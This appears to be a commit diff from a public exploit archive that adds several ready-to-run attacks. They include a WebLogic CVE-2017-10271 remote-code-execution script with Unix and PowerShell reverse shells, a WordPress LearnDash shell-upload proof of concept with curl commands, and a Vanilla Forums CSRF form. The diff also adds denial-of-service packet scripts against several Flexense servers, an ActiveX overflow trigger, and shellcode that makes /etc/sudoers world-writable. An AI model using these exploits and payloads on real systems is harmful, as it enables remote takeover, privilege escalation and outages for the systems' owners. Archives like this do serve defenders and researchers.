log.info("[success] CVE-2017-5689 - {host}:{port}".format(host=host, port=port))
else:
log.info("[failed] CVE-2017-5689 - {host}:{port}".format(host=host, port=port))
## References
# http://thehackernews.com/2017/05/intel-amt-vulnerability.html
# https://www.ssh.com/vulnerability/intel-amt/
# https://www.shodan.io/report/mnAozbpC
# https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf
# https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability

230
exploits/multiple/remote/43458.py Executable file
View file

@ -0,0 +1,230 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: Weblogic wls-wsat Component Deserialization RCE
# Date Authored: Jan 3, 2018
# Date Announced: 10/19/2017
# Exploit Author: Kevin Kirsche (d3c3pt10n)
# Exploit Github: https://github.com/kkirsche/CVE-2017-10271
# Exploit is based off of POC by Luffin from Github
# https://github.com/Luffin/CVE-2017-10271
# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html
# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0
# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS
# CVE: CVE-2017-10271
# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/
# (Python 3) Example check listener: python3 -m http.server 4444
# (Python 2) Example check listener: python -m SimpleHTTPServer 4444
# (Netcat) Example exploit listener: nc -nlvp 4444
from sys import exit
from requests import post
from argparse import ArgumentParser
from random import choice
from string import ascii_uppercase, ascii_lowercase, digits
from xml.sax.saxutils import escape
class Exploit:
def __init__(self, check, rhost, lhost, lport, windows):
self.url = rhost if not rhost.endswith('/') else rhost.strip('/')
self.lhost = lhost
self.lport = lport
self.check = check
if windows:
self.target = 'win'
else:
self.target = 'unix'
if self.target == 'unix':
# Unix reverse shell
# You should also be able to instead use something from MSFVenom. E.g.
# msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444
self.cmd_payload = (
"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket."
"SOCK_STREAM);s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0); os.dup2("
"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
).format(lhost=self.lhost, lport=self.lport)
else:
# Windows reverse shell
# Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444
self.cmd_payload = (
r"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) "
r"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='" + self.lhost +""
r"';$p='"+ self.lport + "';$c=New-Object system.net.sockets.tcpclient;$c.connect($a"
r",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;"
r"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';"
r"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;"
r"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;"
r"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;"
r"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};"
r"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;"
r"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)"
r" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;"
r"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};"
r"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if "
r"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne"
r" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e."
r"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};"
)
self.cmd_payload = escape(self.cmd_payload)
def cmd_base(self):
if self.target == 'win':
return 'cmd'
return '/bin/sh'
def cmd_opt(self):
if self.target == 'win':
return '/c'
return '-c'
def get_generic_check_payload(self):
random_uri = ''.join(
choice(ascii_uppercase + ascii_lowercase + digits)
for _ in range(16))
generic_check_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<object id="url" class="java.net.URL">
<string>http://{lhost}:{lport}/{random_uri}</string>
</object>
<object idref="url">
<void id="stream" method = "openStream" />
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
return generic_check_payload.format(
lhost=self.lhost, lport=self.lport, random_uri=random_uri)
def get_process_builder_payload(self):
process_builder_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>{cmd_base}</string>
</void>
<void index="1">
<string>{cmd_opt}</string>
</void>
<void index="2">
<string>{cmd_payload}</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),
cmd_payload=self.cmd_payload)
def print_banner(self):
print("=" * 80)
print("CVE-2017-10271 RCE Exploit")
print("written by: Kevin Kirsche (d3c3pt10n)")
print("Remote Target: {rhost}".format(rhost=self.url))
print("Shell Listener: {lhost}:{lport}".format(
lhost=self.lhost, lport=self.lport))
print("=" * 80)
def post_exploit(self, data):
headers = {
"Content-Type":
"text/xml;charset=UTF-8",
"User-Agent":
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
}
payload = "/wls-wsat/CoordinatorPortType"
vulnurl = self.url + payload
try:
req = post(
vulnurl, data=data, headers=headers, timeout=10, verify=False)
if self.check:
print("[*] Did you get an HTTP GET request back?")
else:
print("[*] Did you get a shell back?")
except Exception as e:
print('[!] Connection Error')
print(e)
def run(self):
self.print_banner()
if self.check:
print('[+] Generating generic check payload')
payload = self.get_generic_check_payload()
else:
print('[+] Generating execution payload')
payload = self.get_process_builder_payload()
print('[*] Generated:')
print(payload)
if self.check:
print('[+] Running generic check payload')
else:
print('[+] Running {target} execute payload').format(target=self.target)
self.post_exploit(data=payload)
if __name__ == "__main__":
parser = ArgumentParser(
description=
'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'
)
parser.add_argument(
'-l',
'--lhost',
required=True,
dest='lhost',
nargs='?',
help='The listening host that the remote server should connect back to')
parser.add_argument(
'-p',
'--lport',
required=True,
dest='lport',
nargs='?',
help='The listening port that the remote server should connect back to')
parser.add_argument(
'-r',
'--rhost',
required=True,
dest='rhost',
nargs='?',
help='The remote host base URL that we should send the exploit to')
parser.add_argument(
'-c',
'--check',
dest='check',
action='store_true',
help=
'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'
)
parser.add_argument(
'-w',
'--win',
dest='windows',
action='store_true',
help=
'Use the windows cmd payload instead of unix payload (execute mode only).'
)
args = parser.parse_args()
exploit = Exploit(
check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,
windows=args.windows)
exploit.run()

79
exploits/php/webapps/43461.txt Normal file
View file

@ -0,0 +1,79 @@
# Exploit Title: WordPress LearnDash 2.5.3 Unauthenticated Arbitrary
File Upload
# Date: 07-01-2018
# Vendor Homepage: https://www.learndash.com/
# Vendor Changelog: https://www.learndash.com/changelog/
# Version: 2.5.3
# Exploit Author: NinTechNet
# Author Advisory: http://nin.link/learndash/
# Category: Webapps
1. Overview:
This vulnerability has been exploited at least since Dec. 27th, 2017.
Here's a log sample showing the attack:
87.244.138.44 - - [27/Dec/2017:20:29:33 +0100] "POST / HTTP/1.0" 200
47095
87.244.138.44 - - [27/Dec/2017:20:29:34 +0100] "GET
/wp-content/uploads/assignments/assig.php. HTTP/1.1" 200 266
87.244.138.44 - - [27/Dec/2017:20:29:36 +0100] "GET
/wp-admin/ms-site.php HTTP/1.1" 200 4110
2. Description:
The plugin offers the possibility to create courses and to assign
lessons to them. Each lesson can allow uploads, and it is possible to
restrict them by file extensions. Uploads are handled by the
learndash_assignment_process_init() function located in the
"wp-content/plugins/sfwd-lms/includes/ld-assignment-uploads.php" script:
// ===================================================================
function learndash_assignment_process_init() {
if ( isset( $_POST['uploadfile'] ) && isset( $_POST['post'] ) ) {
$post_id = $_POST['post'];
$file = $_FILES['uploadfiles'];
if (( ! empty( $file['name'][0] ) ) && ( learndash_check_upload(
$file, $post_id ) ) ) {
$file_desc = learndash_fileupload_process( $file, $post_id );
$file_name = $file_desc['filename'];
$file_link = $file_desc['filelink'];
$params = array(
'filelink' => $file_link,
'filename' => $file_name,
);
}
}
}
// ===================================================================
Neither this function nor the learndash_check_upload() and
learndash_fileupload_process() functions it calls check if the user is
authenticated or allowed to upload files, or even if the post ID, course
and lesson exist before accepting the file.
The plugin calls the WordPress wp_check_filetype() API function, removes
the filename extension and appends the one returned by this function.
Because wp_check_filetype() will return an empty value for PHP scripts,
the file extension will be removed: "script.php" will become "script.".
But that can be bypassed by appending a double extension, e.g.,
"script.php.php" which will be turned into "script.php.". Although the
PHP filename ends with a [.] dot, it is still executed by default by the
PHP interpreter on servers running Apache with PHP CGI/FastCGI SAPI.
3. Proof of concept:
To exploit the vulnerability, it is only required that the plugin be
enabled, even if no courses or lessons were created (bogus values can be
assigned to each variable):
$ echo '<?php echo exec("ls -la /etc/passwd");' > shell.php.php
$ curl -F "post=foobar" -F "course_id=foobar" -F "uploadfile=foobar" -F
"uploadfiles[]=@./shell.php.php" http://victim.tld/
$ curl 'http://victim.tld/wp-content/uploads/assignments/shell.php.'
-rw-r--r-- 1 root root 2385 Apr 14 2017 /etc/passwd
4. Timeline:
Authors were informed on January 2nd and released version 2.5.4 on January 3rd.

44
exploits/php/webapps/43462.html Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: CSRF vulnerabilities in Vanilla Forums below 2.1.5-CVE-2017-1000432
# Google Dork: NA
# Date: 7/1/2018
# Contact: https://twitter.com/anandm47
# website: https://anandtechzone.blogspot.in <https://t.co/MJ8SoRaIMn>
# Exploit Author: Anand Meyyappan
# Vendor Homepage: https://open.vanillaforums.com <https://open.vanillaforums.com/discussion/28337/vanilla-2-1-5-released-and-2-0-18-14>
# Software Link: https://open.vanillaforums.com/addon/vanilla-core-2.1
# Tested on: Windows, Linux
# CVE : CVE-2017-1000432
Description
Any registered user can delete topics and comments in forum without having admin access.
2.Proof Of Concept
Save the below code in html format, Once victim is logged into account. Use the below code.
<form method="post" action="https://www.site.com/forum/vanilla/discussion/dismissannouncement?discussionid=3709">
<input name=" DeliveryType" value="VIEW" class="input" type="hidden">
<input name=" DeliveryMethod" value="JSON" class="input" type="hidden"> <li>
<label><br></label><input value="Send" class="submit" type="submit"></li> </ul>
</form>
3. Solution:
Update to version 2.5
https://open.vanillaforums.com/get/vanilla-core-2.5
#Reference
https://open.vanillaforums.com/discussion/28337/vanilla-2-1-5-released-and-2-0-18-14
https://www.cvedetails.com/cve/CVE-2017-1000432/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000432

4
exploits/php/webapps/6325.php
View file

@ -555,7 +555,7 @@ class ipb_spl
# User session ok ?
if( !$this->s_admin )
{
$match = 'act=Login&amp;CODE=03';
$match = 'act=Login&CODE=03';
$this->web->addcookie($this->s_cprefix.'session_id', $this->s_sess);
$this->web->get($this->p_url);
}
@ -846,7 +846,7 @@ class ipb_spl
# Regex
$this->reg_lang = '#</span></td>[\r\n]*.*[\r\n]*.*code=export&id=([0-9]+)#i';
$this->reg_lvar = "#id='XX_([\w]+)'[\x20]+class='multitext'>(.*)&lt;/textarea&gt;</td>#i";
$this->reg_lvar = "#id='XX_([\w]+)'[\x20]+class='multitext'>(.*)</textarea></td>#i";
$this->reg_cpre = '#^(.*)session_id$#';
# $this->reg_acp = '#<a href="(.*)"[\x20]+target="_blank"#i';

13
exploits/windows/dos/33403.py
View file

@ -1,10 +1,11 @@
source: http://www.securityfocus.com/bid/37325/info
Intellicom 'NetBiterConfig.exe' is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
#!/usr/bin/python
#
#source: http://www.securityfocus.com/bid/37325/info
#
#Intellicom 'NetBiterConfig.exe' is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
#
#Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
#
# Intellicom NetBiterConfig.exe 1.3.0 Remote Stack Overwrite.
# Ruben Santamarta - www.reversemode.com

46
exploits/windows/dos/43451.py Executable file
View file

@ -0,0 +1,46 @@
# Exploit Title: VX Search Enterprise Server v10.1.12 - Denial of Service
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: http://www.vxsearch.com/setups/vxsearchsrv_setup_v10.1.12.exe
# Version: v10.1.12
# Category; Windows Remote DOS
# CVE: CVE-2017-15662
# Author Homepage: www.unixawy.com
# Description In Flexense VX Search Enterprise Server v10.1.12, the Control Protocl suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9123.
import socket
target = "192.168.72.231"
port = 9123
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e" #evil
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"
s.send(packet)
try:
data = s.recv(100)
print data
except:
print "K1LL3D"

47
exploits/windows/dos/43452.py Executable file
View file

@ -0,0 +1,47 @@
# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - DOS,
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe
# Version: v10.1.18
# Category; Windows Remote DOS
# CVE: CVE-2017-15663
# Author Twitter: @eln1x
# Description In Disk Pulse Enterprise Server v10.1.18, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9120.
import socket
target = "192.168.72.231"
port = 9120
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e" #evil
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"
s.send(packet)
try:
data = s.recv(100)
print data
except:
print "K1LL3D"

46
exploits/windows/dos/43453.py Executable file
View file

@ -0,0 +1,46 @@
# Exploit Title: Sync Breeze Enterprise Server v10.1.16 - Denial of Service
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: http://www.syncbreeze.com/setups/syncbreezesrv_setup_v10.1.16.exe
# Version: v10.1.16
# Category; Windows Remote DOS
# CVE: CVE-2017-15664
# Author Twitter: @eln1x
# Description: Sync Breeze Enterprise Server v10.1.16, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9121.
import socket
target = "192.168.72.231"
port = 9121
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e" #evil
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"
s.send(packet)
try:
data = s.recv(100)
print data
except:
print "K1LL3D"

49
exploits/windows/dos/43454.py Executable file
View file

@ -0,0 +1,49 @@
# Exploit Title: DiskBoss Enterprise Server 8.5.12 - Denial of Service
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: http:///www.diskboss.com/setups/diskbosssrv_setup_v8.5.12.exe
# Version: v10.1.16
# Category; Windows Remote DOS
# CVE: CVE-2017-15665
# Author Homepage: www.unixawy.com
# Description: DiskBoss Enterprise Server 8.5.12 the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 8094.
#!/usr/bin/env python
import socket
target = "192.168.72.133"
port = 8094
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e"
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"
s.send(packet)
try:
data = s.recv(100)
except:
print "K1LL3D"

116
exploits/windows/dos/43456.txt Normal file
View file

@ -0,0 +1,116 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/BARCODEWIZ-v6.7-ACTIVEX-COMPONENT-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.barcodewiz.com
Product:
=============
BarcodeWiz ActiveX Control < 6.7
BarCodeWiz OnLabel. Generates dynamic barcodes from your imported Excel, CSV, or Access files. Print auto incrementing barcodes;
Choose from hundreds of label layouts; Export as PDF or XPS.
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
CVE-2018-5221
Security Issue:
================
BarcodeWiz.DLL BottomText and TopText propertys suffer from buffer overflow vulnerability resulting in (SEH) "Structured Exceptional Handler" overwrite .
This can be exploited by a remote attacker to potentially execute arbitrary attacker supplied code. User would have to visit a malicious webpage using
InternetExplorer where the exploit could be triggered.
SEH chain of main thread
Address SE handler
0018DAC0 kernel32.754E48F3
0018EE34 41414141
41414141 *** CORRUPT ENTRY ***
Exception Code: ACCESS_VIOLATION
Disasm: 2045665 MOV [EDX+ECX],AL (BarcodeWiz.DLL)
SEH Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
BarcodeWiz.2045665 BarcodeWiz.202FF50
BarcodeWiz.202FF50 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
Exploit/POC:
=============
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='VICTIM' />
<script language='vbscript'>
PAYLOAD=String(12308, "A")
VICTIM.BottomText = PAYLOAD
</script>
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: December 26, 2017
Vendor Acknowledgement: January 2, 2018
Vendor "updated version released this week." : January 2, 2018
January 6, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

55
exploits/windows/local/19195.c
View file

@ -1,55 +0,0 @@
// source: http://www.securityfocus.com/bid/83/info
//
// APC PowerChute PLUS is a software package that will safely shutdown computer systems locally or accross a network when UPS power starts to fail. When operating PowerChute PLUS normally listens to TCP ports 6547 and 6548, as well as for broadcast requests in UDP port 6549.
//
// A request packet can be craftted and sent to the UDP port such that the upsd server will crash. This is been tested in the Solaris i386 version of the product.
//
// It has also been reported the software will crash in some instances when port scanned.
//
// It seems you can also manage any APC UPS remotely without providing any credential if you have the APC client software.
//
// Both the client and server software also create files insecurely in /tmp. The pager script (dialpager.sh) also contains unsafe users of temporary files. The mailer script (mailer.sh) passes the files provided in the command line to rm without checking them.
//
// ----- begin downupsd.c -----
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
int main(int argc, char **argv) {
int s;
long on=1;
size_t addrsize;
char buffer[256];
struct sockaddr_in toaddr, fromaddr;
struct hostent h_ent;
if(argc!=2) {
fprintf(stderr, ""Usage:\n\t%s <hostname running upsd>\n"", argv[0]);
exit(0);
}
s = socket(AF_INET,SOCK_DGRAM,0);
setsockopt(s, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on));
printf(""Crashing upsd on host's subnet: %s\n"", argv[1]);
toaddr.sin_family = AF_INET;
toaddr.sin_port = htons(0);
toaddr.sin_addr.s_addr = 0x00000000;
bind(s, (struct sockaddr *)&toaddr, sizeof(struct sockaddr_in));
toaddr.sin_port = htons(6549);
memcpy((char *)&h_ent, (char *)gethostbyname(argv[1]), sizeof(h_ent));
memcpy(&toaddr.sin_addr.s_addr, h_ent.h_addr, sizeof(struct in_addr));
toaddr.sin_addr.s_addr |= 0xff000000;
strcpy(buffer, ""027|1|public|9|0|0|2010~|0\0"");
sendto(s, buffer, 256, 0, (struct sockaddr *)&toaddr,
sizeof(struct sockaddr_in));
printf(""Crashed...\n"");
close(s);
}
------- end downupsd.c -----

861
files_exploits.csv
View file

File diff suppressed because it is too large Load diff

3
files_shellcodes.csv
View file

@ -1,6 +1,6 @@
id,file,description,date,author,type,platform
14113,shellcodes/arm/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
13241,shellcodes/aix/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
13241,shellcodes/aix/13241.c,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
@ -651,3 +651,4 @@ id,file,description,date,author,type,platform
42791,shellcodes/lin_x86-64/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,lin_x86-64
42977,shellcodes/lin_x86/42977.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,lin_x86
42992,shellcodes/win_x86-64/42992.c,"Windows x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,win_x86-64
43463,shellcodes/linux/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux

1 id file description date author type platform
2 14113 shellcodes/arm/14113.txt Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes) 2010-06-29 Jonathan Salwan shellcode arm
3 13241 shellcodes/aix/13241.txt shellcodes/aix/13241.c AIX - execve /bin/sh Shellcode (88 bytes) 2004-09-26 Georgi Guninski shellcode aix
4 13242 shellcodes/bsd/13242.txt BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes) 2000-11-19 Scrippie shellcode bsd
5 13243 shellcodes/bsd_ppc/13243.c BSD/PPC - execve /bin/sh Shellcode (128 bytes) 2004-09-26 Palante shellcode bsd_ppc
6 13244 shellcodes/bsd_x86/13244.c BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes) 2006-07-20 Marco Ivaldi shellcode bsd_x86
651 42791 shellcodes/lin_x86-64/42791.c Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes) 2017-09-25 Touhid M.Shaikh shellcode lin_x86-64
652 42977 shellcodes/lin_x86/42977.c Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes) 2017-10-12 Manuel Mancera shellcode lin_x86
653 42992 shellcodes/win_x86-64/42992.c Windows x64 - API Hooking Shellcode (117 bytes) 2017-10-16 Roziul Hasan Khan Shifat shellcode win_x86-64
654 43463 shellcodes/linux/43463.nasm Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes) 2018-01-04 Hashim Jawad shellcode linux

0
shellcodes/aix/13241.txt → shellcodes/aix/13241.c
View file

79
shellcodes/linux/43463.nasm Normal file
View file

@ -0,0 +1,79 @@
/*
################## Description ####################
; Title : chmod 777 /etc/sudoers - Shellcode
; Author : Hashim Jawad
; Website : ihack4falafel[.]com
; Twitter : @ihack4falafel
; SLAE ID : SLAE-1115
; Purpose : chmod /etc/sudoers permissions
; OS : Linux
; Arch : x86
; Size : 36 bytes
################### chmod.nasm #####################
global _start
section .text
_start:
; push NULL into stack
xor edx, edx
push edx
; push (/etc/sudoers) into stack
push 0x7372656f
push 0x6475732f
push 0x6374652f
; store ESP pointer in EBX
mov ebx, esp
; store octal value of (777) in CX
mov cx, 0x1ff
; execute __NR_chmod syscall
xor eax, eax
mov al, 0xf
int 0x80
; execute __NR_exit syscall
xor eax, eax
mov al,0x1
int 0x80
################### chmod binary #####################
nasm -f elf32 -o chmod.o chmod.nasm
ld -z execstack -o chmod chmod.o
################### Shellcode ########################
objdump -d chmod -M intel
################## Compile #########################
gcc -fno-stack-protector -z execstack chmod.c -o chmod
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xd2\x52\x68\x6f\x65\x72\x73\x68\x2f\x73\x75\x64\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\xff\x01\x31\xc0\xb0\x0f\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}